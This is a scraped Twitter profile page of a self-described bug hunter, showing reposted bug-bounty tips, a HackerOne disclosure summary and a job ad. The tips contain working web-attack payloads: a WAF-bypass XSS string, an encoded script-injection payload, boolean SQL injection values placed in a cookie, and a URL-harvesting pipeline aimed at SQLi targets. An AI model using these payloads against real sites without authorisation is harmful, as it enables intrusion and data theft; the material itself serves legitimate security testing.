Ashish Rao(@AshishRaosahab6) 's Twitter Profileg
Ashish Rao

@AshishRaosahab6

| Cyber Security |
Bug Hunter | #blackbox | #greybox | #whitebox |
https://t.co/Tgs8shLbVh |

ID:2897697889

calendar_today12-11-2014 15:23:23

4,4K Tweets

106 Followers

282 Following

Root Moksha(@RootMoksha) 's Twitter Profile Photo

Time based SQL Injection using waybackurls

waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt

By :Cybertix

tips

Time based SQL Injection using waybackurls waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt By :@thecybertix #bugbounty #bugbountytips
account_circle
XSS Payloads(@XssPayloads) 's Twitter Profile Photo

A payload to bypass Akamai WAF, by jp seg
?foobar=<foo%20bar=%250a%20onclick=<your js code>
Works with any tag and any event handler

account_circle
Süleyman Çelikarslan(@slymn_clkrsln) 's Twitter Profile Photo

Blind SQL injection does not only reveal with content change, 'behavior change' is the key here. In this example, while the server responds in 160ms, when you add 'or 6=6', it responds in ~6500ms. Because the SQLi query was successful, and took its time.
tips

Blind SQL injection does not only reveal with content change, 'behavior change' is the key here. In this example, while the server responds in 160ms, when you add 'or 6=6', it responds in ~6500ms. Because the SQLi query was successful, and took its time. #bugbounty #bugbountytips
account_circle
𐰚𐰼𐰇𐱅(@ynsmroztas) 's Twitter Profile Photo

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background Payload : '%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o #bugbountytips #BugBounty #payload
account_circle
Het Mehta(@hetmehtaa) 's Twitter Profile Photo

Hiring Alert!!

Looking for a Security Analyst...

Role: VAPT & Secure Code Review

Location: Remote

Stipend: 25k-35k

Comment down 'Interested' and I'll DM you the link.

My LinkedIn is filled with these types of posts. 🤷🏻‍♂️

account_circle
H1 Disclosed - Public Disclosures(@h1Disclosed) 's Twitter Profile Photo

⚡ Session Doesn't expire after 2fa and also other session can change passsword
👨🏻‍💻 Sushil Choudhary ➟ SideFX
🟨 Low
💰 $300
🔗 hackerone.com/reports/2234736
tips

⚡ Session Doesn't expire after 2fa and also other session can change passsword 👨🏻‍💻 @0xchoudhary ➟ SideFX 🟨 Low 💰 $300 🔗 hackerone.com/reports/2234736 #bugbounty #bugbountytips #cybersecurity #infosec
account_circle
Mohand Israiwi(@IsrewyMohand) 's Twitter Profile Photo

Found SQL Injection in [org_id] Cookie
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE
-1 OR 6=6 AND 0-0=> TRUE

Injected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0

tip

Found SQL Injection in [org_id] Cookie Payloads for Testing: -1 OR 0=6 AND 0-0=> FALSE -1 OR 6=6 AND 0-0=> TRUE Injected in request like this Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0 #bugbountytip #bugbounty #SQL
account_circle